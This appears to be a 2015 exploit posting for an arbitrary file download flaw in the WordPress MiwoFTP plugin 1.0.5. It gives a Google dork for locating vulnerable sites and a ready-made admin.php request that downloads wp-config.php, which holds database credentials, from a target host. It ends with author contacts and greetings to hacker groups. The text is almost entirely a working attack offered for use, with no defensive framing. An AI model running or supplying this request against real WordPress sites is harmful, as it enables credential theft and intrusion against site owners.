####################### Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download# Exploit Author : Dadou Dz# Software Link : Premium# Dork Google: inurl:com_miwoftp# Affected version: 1.0.5# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog# Date : 2015-04-20# Tested on : Windows 7 / Mozilla Firefox# Linux / Mozilla Firefox####################### Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file": wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
#####################
Discovered By : Dadou Dz
My Email - dadoudzdz@gmail.com
fb: fb.com/Dz2Team
[ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi
Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team
AnonGhost Team -Anonymous Dz - Backup Sec Dz
Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com
And All My Freinds - All Muslims Hackers - All Algerian Hackers
#####################
